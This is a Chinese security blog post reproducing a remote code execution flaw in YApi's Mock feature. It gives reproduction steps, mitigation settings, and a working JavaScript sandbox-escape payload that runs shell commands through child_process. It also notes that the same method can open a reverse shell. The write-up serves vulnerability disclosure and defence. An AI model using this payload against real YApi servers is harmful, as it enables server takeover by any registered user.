YApi Mock功能远程代码执行漏洞复现

admin

102359
文章

87
评论

2021年7月16日01:01:50评论156 views字数 1216阅读4分3秒阅读模式

上方蓝色字体关注我们，一起学安全！

作者：蔷薇@Timeline Sec

本文字数：690

阅读时长：3～4min

声明：请勿用作违法用途，否则后果自负

0x01 简介

YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目，使用mock数据/脚本作为中间交互层，为前端后台开发与测试人员提供更优雅的接口管理服务，该系统被国内较多知名互联网企业所采用。

0x02 漏洞概述

近日，网络上爆出 YApi 的远程代码执行 0day 漏洞，漏洞等级为高危，且正被广泛利用。攻击者通过注册用户后，即可通过Mock功能远程执行任意代码。

因为大量用户使用YApi的默认配置并允许从外部网络访问YApi服务，导致攻击者注册用户后，即可通过 Mock功能远程执行任意代码。

0x03 影响版本

YApi7月7日前版本

0x04 环境搭建

docker部署：

https://github.com/Ryan-Miao/docker-yapi

0x05 漏洞复现

1.注册用户

2.添加项目

YApi Mock功能远程代码执行漏洞复现

访问/add-project

YApi Mock功能远程代码执行漏洞复现

3.添加接口

4.设置mock

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ifconfig").toString()

5.查看Mock地址

6.访问Mock地址

命令成功执行：

7.同理，也可利用命令反弹shell

0x06 修复方式

1、关闭YApi用户注册功能；修改完成后，重启YApi服务

在"config.json"添加"closeRegister:true"配置项：{  "port": "*****",  "closeRegister":true}

2、暂时关闭mock功能（需要修改YApi代码）

在"config.json"中添加"mock: false"；

"exts/yapi-plugin-andvanced-mock/server.js"中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制；

安全组配置白名单访问，或者使用NGINX进行代理，限制白名单IP访问；

4、检查用户列表，删除恶意不明用户；并删除恶意不明用户创建的接口及mock脚本。

阅读原文看更多复现文章

Timeline Sec 团队

安全路上，与你并肩前行

本文始发于微信公众号（Timeline Sec）：YApi Mock功能远程代码执行漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

YApi Mock功能远程代码执行漏洞复现

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)

浅谈Kubernetes安全

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

发表评论

在线咨询

微信